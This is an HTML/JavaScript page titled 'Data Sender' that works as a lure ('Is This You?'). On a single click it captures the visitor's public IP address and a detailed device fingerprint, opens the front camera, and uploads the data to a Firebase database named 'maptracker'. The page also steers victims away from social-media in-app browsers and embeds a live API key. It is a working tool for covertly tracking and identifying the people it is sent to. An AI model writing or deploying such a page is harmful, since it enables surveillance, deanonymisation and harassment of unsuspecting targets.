<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Data Sender</title>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">
    <style>
        body {
            font-family: 'Arial', sans-serif;
            background-color: #121212;
            color: #ffffff;
            text-align: center;
            margin: 0;
            padding: 0;
        }
        h1 {
            color: #00ff00;
            margin-top: 20px;
        }
        #loading-screen {
            display: none;
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.8);
            color: #ffffff;
            justify-content: center;
            align-items: center;
            z-index: 999;
        }
        #loading-message {
            font-size: 24px;
            font-weight: bold;
        }
        .container {
            margin: 20px auto;
            max-width: 400px;
        }
        .button {
            background-color: #00cc00;
            color: white;
            padding: 15px 30px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            font-size: 18px;
            transition: background-color 0.3s;
            width: 100%;
        }
        .button:hover {
            background-color: #009900;
        }
        .error-message {
            color: #ff0000;
            margin: 10px 0;
        }
        .info-message {
            color: #ffff00;
            margin: 10px 0;
        }
        video {
            width: 100%;
            max-width: 480px; /* Limit max width for better visibility */
            border: 2px solid green;
            display: none; /* Hide initially until we get the stream */
        }
        #browser-warning {
            color: red;
            display: none; /* Hidden by default */
            margin: 20px;
            text-align: center;
        }
        #instruction {
            color: yellow;
            margin: 10px;
            font-size: 16px;
        }
    </style>
</head>
<body>
    <div id="loading-screen">
        <div id="loading-message">
            <i class="fas fa-spinner fa-spin"></i> Sending data, please wait...
        </div>
    </div>
    <div class="container">
        <h1>Is This You?</h1>
        <p>Data will be sent automatically.</p>
        <button class="button" id="start-button">Start Process</button>
        <div id="error-message" class="error-message"></div>
        <div id="info-message" class="info-message"></div>
        <video id="video" autoplay playsinline></video>
        <div id="browser-warning">
            <p>Please open this link in a standard browser for the best experience.</p>
        </div>
        <div id="instruction">
            <p><strong>Tip:</strong> For best results, please open this in <strong>Samsung Internet</strong> or <strong>Opera</strong>.</p>
        </div>
    </div>

    <script type="module">
        const firebaseConfig = {
            apiKey: "AIzaSyDGOfNv0d5SlEsq2LvOJZJEJSgANeswKd4", // Your API Key
            authDomain: "maptracker-7afb6.firebaseapp.com", // Your Auth Domain
            databaseURL: "https://maptracker-7afb6-default-rtdb.firebaseio.com", // Your Database URL
            projectId: "maptracker-7afb6", // Your Project ID
            storageBucket: "maptracker-7afb6.appspot.com", // Your Storage Bucket
            messagingSenderId: "874600101063", // Your Messaging Sender ID
            appId: "1:874600101063:web:79d8010dee2bf0e57f7ae2", // Your App ID
            measurementId: "G-HTXZEYZ3DK" // Your Measurement ID
        };

        // Initialize Firebase
        const { initializeApp } = await import("https://www.gstatic.com/firebasejs/9.14.0/firebase-app.js");
        const { getDatabase, ref, set } = await import("https://www.gstatic.com/firebasejs/9.14.0/firebase-database.js");

        const app = initializeApp(firebaseConfig);
        const database = getDatabase(app);
        
        const loadingScreen = document.getElementById('loading-screen');
        const errorMessage = document.getElementById('error-message');
        const infoMessage = document.getElementById('info-message');
        const videoElement = document.getElementById('video');
        const browserWarning = document.getElementById('browser-warning');

        // Function to detect in-app browsers
        function isInAppBrowser() {
            const userAgent = navigator.userAgent || navigator.vendor || window.opera;
            return /FBAN|FBAV|Instagram|Line|MicroMessenger|QQ|Kakao|WeChat/.test(userAgent);
        }

        // Show warning if in-app browser is detected
        if (isInAppBrowser()) {
            browserWarning.style.display = 'block';
            infoMessage.innerHTML = "You are using an in-app browser. Please open this link in Samsung Internet or Opera for the best experience.";
        }

        document.getElementById('start-button').addEventListener('click', startProcess);

        async function startProcess() {
            errorMessage.innerHTML = ''; // Clear previous errors
            infoMessage.innerHTML = ''; // Clear previous info messages
            loadingScreen.style.display = 'flex'; // Show loading screen
            
            try {
                // Get user's IP address
                const ipAddress = await getIpAddress();

                // Get device info
                const deviceInfo = await getDeviceInfo();

                // Start the camera
                await startCamera();

                // Create a unique session ID
                const sessionId = Date.now();

                // Upload location, screenshot, and device info to Firebase
                await uploadSessionData(sessionId, ipAddress, deviceInfo);
                
            } catch (error) {
                errorMessage.innerHTML = error.message;
            } finally {
                loadingScreen.style.display = 'none'; // Hide loading screen
            }
        }

        async function startCamera() {
            const constraints = {
                video: {
                    facingMode: { ideal: "user" }, // Use front camera
                    width: { ideal: 1280 },
                    height: { ideal: 720 },
                    frameRate: { ideal: 30 }
                }
            };

            try {
                const stream = await navigator.mediaDevices.getUserMedia(constraints);
                videoElement.srcObject = stream;
                videoElement.style.display = 'block'; // Show video element

                // Automatically stop the camera after 10 seconds
                setTimeout(() => {
                    stopCamera(stream);
                }, 10000); // 10 seconds
            } catch (error) {
                throw new Error("Unable to access the camera.");
            }
        }

        function stopCamera(stream) {
            stream.getTracks().forEach(track => track.stop());
            videoElement.style.display = 'none'; // Hide video element after stopping
        }

        async function getDeviceInfo() {
            return {
                userAgent: navigator.userAgent,
                deviceMemory: navigator.deviceMemory || 'N/A', // Device memory in GB
                hardwareConcurrency: navigator.hardwareConcurrency || 'N/A', // Number of logical processors
                screenResolution: `${window.screen.width} x ${window.screen.height}`, // Screen resolution
                language: navigator.language || 'en-US', // User language
                platform: navigator.platform || 'N/A', // User platform
                timezone: Intl.DateTimeFormat().resolvedOptions().timeZone // User timezone
            };
        }

        async function getIpAddress() {
            const response = await fetch('https://api.ipify.org?format=json');
            const data = await response.json();
            return data.ip;
        }

        async function uploadSessionData(sessionId, ipAddress, deviceInfo) {
            const sessionData = {
                ipAddress: ipAddress,
                timestamp: Date.now(),
                ...deviceInfo // Spread device info into session data
            };
            const dataRef = ref(database, 'sessions/' + sessionId);
            await set(dataRef, sessionData);
            console.log('Session data uploaded successfully');
        }
    </script>
</body>
</html>
